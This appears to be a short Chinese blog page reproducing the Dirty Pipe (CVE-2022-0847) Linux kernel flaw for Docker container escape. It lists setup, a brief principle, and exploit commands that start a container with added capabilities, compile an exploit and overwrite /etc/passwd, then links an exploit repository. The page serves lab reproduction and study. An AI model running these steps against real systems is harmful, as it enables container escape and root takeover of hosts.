当前位置: 首页 > news >正文

Docker Dirtypipe(CVE-2022-0847)漏洞复现与分析容器逃逸

安装环境

./metarget cnv install cve-2022-0847 --verbose

原理

同脏牛,通过写只读内存,对映射的内存做篡改

EXP


docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"错误则运行下列命令docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntugcc dp.c -o dp读系统文件:/exp/dp /etc/passwd写系统文件 /exp/dp /etc/passwd 1 ootz:

GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸

参考

云原生之容器安全实践-安全客 - 安全资讯平台 (anquanke.com)

从脏管道(CVE-2022-0847)到docker逃逸 - 先知社区 (aliyun.com)

http://www.lryc.cn/news/120620.html

相关文章:

  • python接口自动化测试框架2.0,让你像Postman一样编写测试用例,支持多环境切换、多业务依赖、数据库断言等
  • Vue.js2+Cesium1.103.0 九、淹没分析效果
  • SpringBoot案例-部门管理-新增
  • 微信小程序中背景图片如何占满整个屏幕,拉伸
  • Java并发编程(四)线程同步 中 [AQS/Lock]
  • PyTorch深度学习环境安装(Anaconda、CUDA、cuDNN)及关联PyCharm
  • Active Directory安全和风险状况管理
  • 学术论文GPT源码解读:从chatpaper、chatwithpaper到gpt_academic
  • 单链表(C语言版)
  • 初学vue3时应该注意的几个问题
  • 基于Selenium技术方案的爬虫入门实践
  • 【C++入门到精通】C++入门 —— vector (STL)
  • git简单使用
  • CSS—选择器
  • 【Unity实战系列】Unity的下载安装以及汉化教程
  • 电脑IP地址错误无法上网怎么办?
  • 机器视觉项目流程和学习方法
  • LNMP环境搭建wordpress以及跳转后台报404解决
  • Nginx+Tomcat的动静分离
  • Tomcat部署与优化
  • jmeter工具使用
  • 【uniapp】封装一个全局自定义的模态框
  • UNIX 入门
  • Golang通过alibabaCanal订阅MySQLbinlog
  • Python flask-restful 框架讲解
  • MySQL_约束、多表关系
  • 在Qt中使用LoadLibrary无法加载DLL
  • 如何将区块链新闻稿发布到海外媒体?
  • 基于 CentOS 7 构建 LVS-DR 群集。
  • 防火墙组建双击热备后,点击管理对端设备,老是打不开,怎么办?